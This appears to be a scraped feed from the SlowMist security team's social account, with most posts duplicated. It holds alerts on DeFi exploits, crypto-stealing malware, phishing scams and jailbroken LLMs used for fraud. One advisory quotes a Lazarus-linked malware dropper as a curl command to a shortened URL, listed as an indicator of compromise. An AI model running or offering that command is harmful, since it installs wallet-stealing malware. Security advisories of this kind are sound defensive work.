SlowMist_Team
0 تتابع
1 المتابعون
2 إعجاب
0 تمّت مُشاركتها
منشورات
عرض الترجمة
🚨SlowMist TI Alert🚨
Our monitoring system MistEye has detected suspicious transactions involving @ResupplyFi , with losses of approximately $5.59M.
The attacker manipulated the cvcrvUSD exchange rate by making donations to the cvcrvUSD Controller contract, ultimately stealing a large amount of reUSD tokens.
As always, stay vigilant!
Our monitoring system MistEye has detected suspicious transactions involving @ResupplyFi , with losses of approximately $5.59M.
The attacker manipulated the cvcrvUSD exchange rate by making donations to the cvcrvUSD Controller contract, ultimately stealing a large amount of reUSD tokens.
As always, stay vigilant!
عرض الترجمة
🚨SlowMist TI Alert🚨
Our monitoring system MistEye has detected suspicious transactions involving @ResupplyFi , with losses of approximately $5.59M.
The attacker manipulated the cvcrvUSD exchange rate by making donations to the crvUSD Controller contract, ultimately stealing a large amount of reUSD tokens.
As always, stay vigilant!
Our monitoring system MistEye has detected suspicious transactions involving @ResupplyFi , with losses of approximately $5.59M.
The attacker manipulated the cvcrvUSD exchange rate by making donations to the crvUSD Controller contract, ultimately stealing a large amount of reUSD tokens.
As always, stay vigilant!
عرض الترجمة
🚨 SlowMist TI Alert 🚨
A new malware named #SparkKitty that steals all photos from infected iOS & Android devices — searching for crypto wallet seed phrases.
⚠️ Delivered via:
🔸 "币coin" (App Store)
🔸 "SOEX" (Google Play, 10K+ installs, now removed)
🔸 Casino apps, adult games, TikTok clones
🌍 Mainly targeting users in Southeast Asia & China, but no regional limits.
🛡️ Key tips:
🔹 Don't install unknown apps
🔹 Avoid APK sideloading
🔹 Use antivirus tools
Stay alert! (Source: @kaspersky)
A new malware named #SparkKitty that steals all photos from infected iOS & Android devices — searching for crypto wallet seed phrases.
⚠️ Delivered via:
🔸 "币coin" (App Store)
🔸 "SOEX" (Google Play, 10K+ installs, now removed)
🔸 Casino apps, adult games, TikTok clones
🌍 Mainly targeting users in Southeast Asia & China, but no regional limits.
🛡️ Key tips:
🔹 Don't install unknown apps
🔹 Avoid APK sideloading
🔹 Use antivirus tools
Stay alert! (Source: @kaspersky)
عرض الترجمة
💰Over $50B USDT in deposits and $50B in withdrawals flowed through HuionePay in the past 18 months — now under global regulatory scrutiny for allegedly receiving, moving, and cashing out scam funds (mostly via USDT on TRON).
We dug into the data with @MistTrack_io and built a Dune dashboard to map its on-chain footprint.
📊Dashboard: https://t.co/DHKtY3X9th
✍️Report: https://t.co/O6uWC2S1qU
#TRON #USDT #CryptoSecurity #AML #SlowMist #MistTrack #Huione
We dug into the data with @MistTrack_io and built a Dune dashboard to map its on-chain footprint.
📊Dashboard: https://t.co/DHKtY3X9th
✍️Report: https://t.co/O6uWC2S1qU
#TRON #USDT #CryptoSecurity #AML #SlowMist #MistTrack #Huione
عرض الترجمة
🚨 Security TI Alert 🚨
According to community partner @1nf0s3cpt, an active phishing campaign is targeting Web3 users with fake job offers (e.g. $120/hour) to trick them into executing a malicious script that steals wallet files.
🔍 Key IOCs:
🔸GitLab repo: https://t.co/ivGN93PS4b
🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
🧪 The attack method is very similar to the previous Lazarus use of NPM packages to spread malicious code:
https://t.co/bBC4i2vYpA
🚨 We found that a new malicious NPM package was just published:
https://t.co/SjgmO1FOIL
🔸Likely linked GitHub: apollo-hero
🔸Uploader email: skelstar125@gmail.com
⚠️ Do NOT install or run unknown packages or scripts. Always verify sources.
#LAZARUS #Phishing
According to community partner @1nf0s3cpt, an active phishing campaign is targeting Web3 users with fake job offers (e.g. $120/hour) to trick them into executing a malicious script that steals wallet files.
🔍 Key IOCs:
🔸GitLab repo: https://t.co/ivGN93PS4b
🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
🧪 The attack method is very similar to the previous Lazarus use of NPM packages to spread malicious code:
https://t.co/bBC4i2vYpA
🚨 We found that a new malicious NPM package was just published:
https://t.co/SjgmO1FOIL
🔸Likely linked GitHub: apollo-hero
🔸Uploader email: skelstar125@gmail.com
⚠️ Do NOT install or run unknown packages or scripts. Always verify sources.
#LAZARUS #Phishing
عرض الترجمة
🚨SlowMist TI Alert🚨
MistEye has detected potential suspicious activities related to the @Bankroll_Status .
As always, stay vigilant!
https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e
MistEye has detected potential suspicious activities related to the @Bankroll_Status .
As always, stay vigilant!
https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e
عرض الترجمة
🚨SlowMist Security Alert🚨
We have detected potential suspicious activities related to @meta_pool. The root cause is that the _deposit function has been rewritten, enabling arbitrary minting through the mint function without the need to transfer tokens.
As always, stay vigilant!
We have detected potential suspicious activities related to @meta_pool. The root cause is that the _deposit function has been rewritten, enabling arbitrary minting through the mint function without the need to transfer tokens.
As always, stay vigilant!
عرض الترجمة
🚨 SlowMist Security Alert🚨
‼️Beware of a new threat from the LAZARUS APT group — #OtterCookie info-stealer malware is targeting professionals in the finance and crypto industries.
🎯 Attack tactics:
🔹Posing as reputable companies with fake interviews or investment pitches
🔹Using deepfakes to impersonate interviewers/investors in video calls
🔹Tricking victims into running malware disguised as coding challenges or video app updates
🔹Once executed, OtterCookie steals sensitive data silently
🕵️♂️ Targets include:
🔹Browser-stored credentials
🔹macOS Keychain passwords & certificates
🔹Locally stored crypto wallet info & private keys
🛡️ Stay safe:
🔹Verify all unsolicited job/investment offers
🔹Never run unknown binaries, especially “challenges” or “updates”
🔹Use anti-virus software and monitor for abnormal behaviors
📚 Read more about #APT:
https://t.co/hyzwQoiu23
cc @im23pds
‼️Beware of a new threat from the LAZARUS APT group — #OtterCookie info-stealer malware is targeting professionals in the finance and crypto industries.
🎯 Attack tactics:
🔹Posing as reputable companies with fake interviews or investment pitches
🔹Using deepfakes to impersonate interviewers/investors in video calls
🔹Tricking victims into running malware disguised as coding challenges or video app updates
🔹Once executed, OtterCookie steals sensitive data silently
🕵️♂️ Targets include:
🔹Browser-stored credentials
🔹macOS Keychain passwords & certificates
🔹Locally stored crypto wallet info & private keys
🛡️ Stay safe:
🔹Verify all unsolicited job/investment offers
🔹Never run unknown binaries, especially “challenges” or “updates”
🔹Use anti-virus software and monitor for abnormal behaviors
📚 Read more about #APT:
https://t.co/hyzwQoiu23
cc @im23pds
عرض الترجمة
🚨SlowMist Security Alert🚨
SlowMist recently received intelligence indicating that the Lazarus APT group is using a new stealer called OtterCookie in targeted attacks on crypto & finance pros.
🎭Tactics:
- Fake job interviews/investor calls
- Deepfake videos to impersonate recruiters
- Malware disguised as “coding challenges” or “updates”
😈Steals:
- Browser-stored login credentials
- Passwords & certificates from macOS Keychain
- Wallet info & private keys
🛡️Security Recommendations:
🔹Treat unsolicited job/investment offers and remote interviews with caution.
🔹Never run unknown binaries, especially if presented as “technical challenges” or “update packages.”
🔹Enhance EDR capabilities and monitor for abnormal activity. Use antivirus tools and regularly audit your endpoints.
⚠️Stay safe — always verify before you trust.
#Lazarus #APT #OtterCookie #CryptoSecurity
SlowMist recently received intelligence indicating that the Lazarus APT group is using a new stealer called OtterCookie in targeted attacks on crypto & finance pros.
🎭Tactics:
- Fake job interviews/investor calls
- Deepfake videos to impersonate recruiters
- Malware disguised as “coding challenges” or “updates”
😈Steals:
- Browser-stored login credentials
- Passwords & certificates from macOS Keychain
- Wallet info & private keys
🛡️Security Recommendations:
🔹Treat unsolicited job/investment offers and remote interviews with caution.
🔹Never run unknown binaries, especially if presented as “technical challenges” or “update packages.”
🔹Enhance EDR capabilities and monitor for abnormal activity. Use antivirus tools and regularly audit your endpoints.
⚠️Stay safe — always verify before you trust.
#Lazarus #APT #OtterCookie #CryptoSecurity
عرض الترجمة
⚠️As AI races forward, a darker side emerges: Unrestricted Large Language Models.
Unlike mainstream LLMs with built-in safety guards, these "jailbroken" or deliberately modified models are designed to bypass ethical restrictions—enabling phishing, malware generation, and fraud.
In this article, we explore the rise of tools like WormGPT, FraudGPT, and GhostGPT, their abuse in the crypto space, and the growing security challenges they pose.
Read the full analysis👇
https://t.co/yt1r95mlP4
#AI #Cybersecurity #LLM #Phishing #Malware
Unlike mainstream LLMs with built-in safety guards, these "jailbroken" or deliberately modified models are designed to bypass ethical restrictions—enabling phishing, malware generation, and fraud.
In this article, we explore the rise of tools like WormGPT, FraudGPT, and GhostGPT, their abuse in the crypto space, and the growing security challenges they pose.
Read the full analysis👇
https://t.co/yt1r95mlP4
#AI #Cybersecurity #LLM #Phishing #Malware
عرض الترجمة
🚨 SlowMist Security Alert🚨
The Android banking trojan #Crocodilus is now targeting crypto users and banking apps globally after recent upgrades.
⚠️ Key threats:
🔹Spreads via fake browser updates in Facebook ads
🔹Steals login credentials using overlay attacks
🔹Extracts crypto wallet seed phrases & private keys
🔹Injects fake "bank support" numbers into contact lists
🔹Malware-as-a-Service: Available for rent (100–300 USDT/attack)
📵 Avoid unknown app updates & ad links.
Stay alert! (Source: @ThreatFabric)
The Android banking trojan #Crocodilus is now targeting crypto users and banking apps globally after recent upgrades.
⚠️ Key threats:
🔹Spreads via fake browser updates in Facebook ads
🔹Steals login credentials using overlay attacks
🔹Extracts crypto wallet seed phrases & private keys
🔹Injects fake "bank support" numbers into contact lists
🔹Malware-as-a-Service: Available for rent (100–300 USDT/attack)
📵 Avoid unknown app updates & ad links.
Stay alert! (Source: @ThreatFabric)
🚨ملخص أمان الويب 3 لشهر مايو 2025🚨
📊وفقًا لموقع SlowMist's Hacked (https://t.co/e90CSvTm6B):
⚠️15 عملية اختراق ➡️ خسارة حوالي 257 مليون دولار
❄️ استرداد/تجميد حوالي 162 مليون دولار
🎣خسائر التصيد الاحتيالي عبر @realScamSniffer:
7,164 ضحية ➡️ سرقة حوالي 9.6 مليون دولار
الحوادث الرئيسية:
• خسر بروتوكول Cetus 230 مليون دولار في هجوم تجاوز فيض الرياضيات
• استُغل بروتوكول Cork بأكثر من 12 مليون دولار بسبب عدم كفاية التحقق من صحة البيانات التي قدمها المستخدم
• خسر BitoPro 11.5 مليون دولار؛ غسل الأموال عبر تورنادو كاش، وثورتشين، ووسابي
• خسرت شركة ديمكس 950 ألف دولار أمريكي نتيجة تلاعب أوراكل استهدف خزنة قديمة.
• خسرت شركة زونامي 500 ألف دولار أمريكي؛ والسبب الجذري قيد التحقيق.
أبرز التطورات الأمنية:
⚠️ ثغرات العقود تسببت في 95% من إجمالي خسائر الاختراق.
🎭 ازدياد عمليات الاستيلاء على الحسابات مجددًا.
😈 تستهدف مجموعة لازاروس الآن الأفراد - خسر أحد الضحايا 5.2 مليون دولار أمريكي بسبب البرامج الضارة.
✍️ التقرير الكامل:
📊وفقًا لموقع SlowMist's Hacked (https://t.co/e90CSvTm6B):
⚠️15 عملية اختراق ➡️ خسارة حوالي 257 مليون دولار
❄️ استرداد/تجميد حوالي 162 مليون دولار
🎣خسائر التصيد الاحتيالي عبر @realScamSniffer:
7,164 ضحية ➡️ سرقة حوالي 9.6 مليون دولار
الحوادث الرئيسية:
• خسر بروتوكول Cetus 230 مليون دولار في هجوم تجاوز فيض الرياضيات
• استُغل بروتوكول Cork بأكثر من 12 مليون دولار بسبب عدم كفاية التحقق من صحة البيانات التي قدمها المستخدم
• خسر BitoPro 11.5 مليون دولار؛ غسل الأموال عبر تورنادو كاش، وثورتشين، ووسابي
• خسرت شركة ديمكس 950 ألف دولار أمريكي نتيجة تلاعب أوراكل استهدف خزنة قديمة.
• خسرت شركة زونامي 500 ألف دولار أمريكي؛ والسبب الجذري قيد التحقيق.
أبرز التطورات الأمنية:
⚠️ ثغرات العقود تسببت في 95% من إجمالي خسائر الاختراق.
🎭 ازدياد عمليات الاستيلاء على الحسابات مجددًا.
😈 تستهدف مجموعة لازاروس الآن الأفراد - خسر أحد الضحايا 5.2 مليون دولار أمريكي بسبب البرامج الضارة.
✍️ التقرير الكامل:
عرض الترجمة
🚨Scam Warning
We recently assisted a user who encountered a suspicious tool claiming his wallet had a “risky authorization.” The tool prompted him to paste his private key to resolve the issue.
After investigation, we identified the site—signature[.]land—as a phishing platform. The site has also been flagged as malicious by Web3 anti-scam platform @realScamSniffer.
Key findings:
♦️UI mimics the legitimate Revoke tool
♦️Risk results are fabricated for any input
♦️All user input is sent directly to: abpulimali@gmail[.]com
The operator behind this site, @Titanspace3, employs multiple deceptive tactics:
🎭Uses @zachxbt’s avatar on Telegram
🎭Poses as a SlowMist employee
🎭Runs a 74K-follower X account, frequently commenting under crypto users’ posts, falsely claiming their wallets are at risk and directing them to a phishing link disguised as a “security tool.”
Scam flow:
1⃣Fabricate panic around “risky approvals”
2⃣Lure victims into using a phishing site
3⃣Instruct them to input private keys for “revocation”
🛡️Recommendations
– Never paste your private key into any website
– Only use security tools from verified, official sources
– Stay vigilant and follow a zero-trust mindset
For a full breakdown of this case, see our latest article:
https://t.co/IvrVPrT6Su
#Phishing #Crypto #Web3 #Scam #SocialEngineering #Revoke
We recently assisted a user who encountered a suspicious tool claiming his wallet had a “risky authorization.” The tool prompted him to paste his private key to resolve the issue.
After investigation, we identified the site—signature[.]land—as a phishing platform. The site has also been flagged as malicious by Web3 anti-scam platform @realScamSniffer.
Key findings:
♦️UI mimics the legitimate Revoke tool
♦️Risk results are fabricated for any input
♦️All user input is sent directly to: abpulimali@gmail[.]com
The operator behind this site, @Titanspace3, employs multiple deceptive tactics:
🎭Uses @zachxbt’s avatar on Telegram
🎭Poses as a SlowMist employee
🎭Runs a 74K-follower X account, frequently commenting under crypto users’ posts, falsely claiming their wallets are at risk and directing them to a phishing link disguised as a “security tool.”
Scam flow:
1⃣Fabricate panic around “risky approvals”
2⃣Lure victims into using a phishing site
3⃣Instruct them to input private keys for “revocation”
🛡️Recommendations
– Never paste your private key into any website
– Only use security tools from verified, official sources
– Stay vigilant and follow a zero-trust mindset
For a full breakdown of this case, see our latest article:
https://t.co/IvrVPrT6Su
#Phishing #Crypto #Web3 #Scam #SocialEngineering #Revoke
عرض الترجمة
🎉 SlowMist x Foresight News Dragon Boat Festival Giveaway 🎉
Your mnemonic phrase is the lifeline of your crypto — keep it safe, keep it in mind. 🧠⛓️
@Foresight_News just dropped a cool new collectible, we're giving away 3 to the community!
To enter:
1⃣ Follow @Foresight_News & @SlowMist_Team
2⃣ Like + RT this tweet & tag 3 friends
Winners announced: June 4 🎁
Good luck to everyone!🤩
Your mnemonic phrase is the lifeline of your crypto — keep it safe, keep it in mind. 🧠⛓️
@Foresight_News just dropped a cool new collectible, we're giving away 3 to the community!
To enter:
1⃣ Follow @Foresight_News & @SlowMist_Team
2⃣ Like + RT this tweet & tag 3 friends
Winners announced: June 4 🎁
Good luck to everyone!🤩
عرض الترجمة
🚨SlowMist Security Alert🚨
We detected potential suspicious activity related to @Corkprotocol.
As always, stay vigilant!
We detected potential suspicious activity related to @Corkprotocol.
As always, stay vigilant!
🚨تنبيه أمني من SlowMist🚨
☠️أبلغ العديد من المستخدمين مؤخرًا عن تلقيهم رسائل نصية قصيرة من "منصات تداول معروفة"، تقول:
🎭 "رمز التحقق من عملية السحب الخاص بك هو xxx. إذا لم تطلب هذه المعاملة، فاتصل بـ xxx فورًا للمساعدة."
📱بمجرد معاودة الاتصال، يُقال لك إنه "خرق أمني" ويتم توصيلك بشخص يدّعي أنه من "دعم محافظ الأجهزة".
🎣يوجهونك إلى موقع تصيد احتيالي ويخدعونك لإدخال عبارتك المميزة - مما يؤدي إلى سرقة محافظ باردة تزيد قيمتها عن مليون دولار.
⚠️يعرف المحتالون أنك تثق في منصات التداول - ويستغلون هذه الثقة لخداعك خطوة بخطوة.
كشفنا مؤخرًا عن حالة مشابهة - اطلع على تقريرنا المفصل لتعزيز وعيك ودفاعاتك:
https://t.co/OLGtlY1HBV
تذكر:
🔒 لا تشارك أبدًا عبارتك المميزة.
🚫 لا تثق بالمكالمات أو الرسائل النصية أو الروابط غير المتوقعة. تحقق دائمًا من مصادر رسمية.
#Web3Security#PhishingAlert#ColdWallet#CryptoScam #SocialEngineering
☠️أبلغ العديد من المستخدمين مؤخرًا عن تلقيهم رسائل نصية قصيرة من "منصات تداول معروفة"، تقول:
🎭 "رمز التحقق من عملية السحب الخاص بك هو xxx. إذا لم تطلب هذه المعاملة، فاتصل بـ xxx فورًا للمساعدة."
📱بمجرد معاودة الاتصال، يُقال لك إنه "خرق أمني" ويتم توصيلك بشخص يدّعي أنه من "دعم محافظ الأجهزة".
🎣يوجهونك إلى موقع تصيد احتيالي ويخدعونك لإدخال عبارتك المميزة - مما يؤدي إلى سرقة محافظ باردة تزيد قيمتها عن مليون دولار.
⚠️يعرف المحتالون أنك تثق في منصات التداول - ويستغلون هذه الثقة لخداعك خطوة بخطوة.
كشفنا مؤخرًا عن حالة مشابهة - اطلع على تقريرنا المفصل لتعزيز وعيك ودفاعاتك:
https://t.co/OLGtlY1HBV
تذكر:
🔒 لا تشارك أبدًا عبارتك المميزة.
🚫 لا تثق بالمكالمات أو الرسائل النصية أو الروابط غير المتوقعة. تحقق دائمًا من مصادر رسمية.
#Web3Security#PhishingAlert#ColdWallet#CryptoScam #SocialEngineering
عرض الترجمة
In recent years, Coinbase users have repeatedly become targets of social engineering attacks — and on May 15, Coinbase confirmed insider involvement.
How it works:
📞 Fake support call
📲 Walk user through Coinbase Wallet
⚠️ Provide scam mnemonic phrase
💸 Drain assets under stress & urgency
With @MistTrack_io, we traced the flows:
▪️ BTC bridged via THORChain / Chainflip / Defiway Bridge → DAI/USDT
▪️ ETH swapped on Uniswap → DAI/USDT
▪️ Funds laundered or still dormant
Full breakdown👇
https://t.co/OLGtlY2frt
#CryptoSecurity #SocialEngineering #Web3Security #Coinbase #Phishing
How it works:
📞 Fake support call
📲 Walk user through Coinbase Wallet
⚠️ Provide scam mnemonic phrase
💸 Drain assets under stress & urgency
With @MistTrack_io, we traced the flows:
▪️ BTC bridged via THORChain / Chainflip / Defiway Bridge → DAI/USDT
▪️ ETH swapped on Uniswap → DAI/USDT
▪️ Funds laundered or still dormant
Full breakdown👇
https://t.co/OLGtlY2frt
#CryptoSecurity #SocialEngineering #Web3Security #Coinbase #Phishing
عرض الترجمة
🚨SlowMist Scam Alert🚨
We’ve received reports of fake Telegram groups impersonating #SlowMist and scamming users via phishing investment links. One example: ❌t[.]me/slowmist1 — this is NOT us.‼️
✅ Please report such groups to Telegram immediately.
For your safety, always refer to our official channels:
1⃣Website: https://t.co/IO2VWk2pae
2⃣X: @SlowMist_Team & @MistTrack_io
3⃣Email: team@slowmist.com
If in doubt, feel free to DM us directly.
⚠️Stay vigilant and verify before you trust.
We’ve received reports of fake Telegram groups impersonating #SlowMist and scamming users via phishing investment links. One example: ❌t[.]me/slowmist1 — this is NOT us.‼️
✅ Please report such groups to Telegram immediately.
For your safety, always refer to our official channels:
1⃣Website: https://t.co/IO2VWk2pae
2⃣X: @SlowMist_Team & @MistTrack_io
3⃣Email: team@slowmist.com
If in doubt, feel free to DM us directly.
⚠️Stay vigilant and verify before you trust.
عرض الترجمة
🚀Big news! @MistTrack_io MCP is now live for testing!
You can now use natural language in #Claude, #Cursor, and other MCP-supported clients to call #MistTrack’s on-chain analysis APIs — from address profiling & risk scoring to fund flow graphs.
🧐Smarter, faster, and easier blockchain investigations — powered by AI.
✍️In our latest post:
🔹What is MistTrack MCP
🔹How to use it
🔹Core features
🔹Real use case examples
https://t.co/Fvn2YZIuoI
👋Ready to explore the new AI paradigm for on-chain tracing? Start here:
https://t.co/UCDcC9Dt51
#Web3 #AI #BlockchainSecurity #MCP
You can now use natural language in #Claude, #Cursor, and other MCP-supported clients to call #MistTrack’s on-chain analysis APIs — from address profiling & risk scoring to fund flow graphs.
🧐Smarter, faster, and easier blockchain investigations — powered by AI.
✍️In our latest post:
🔹What is MistTrack MCP
🔹How to use it
🔹Core features
🔹Real use case examples
https://t.co/Fvn2YZIuoI
👋Ready to explore the new AI paradigm for on-chain tracing? Start here:
https://t.co/UCDcC9Dt51
#Web3 #AI #BlockchainSecurity #MCP
سجّل الدخول لاستكشاف المزيد من المُحتوى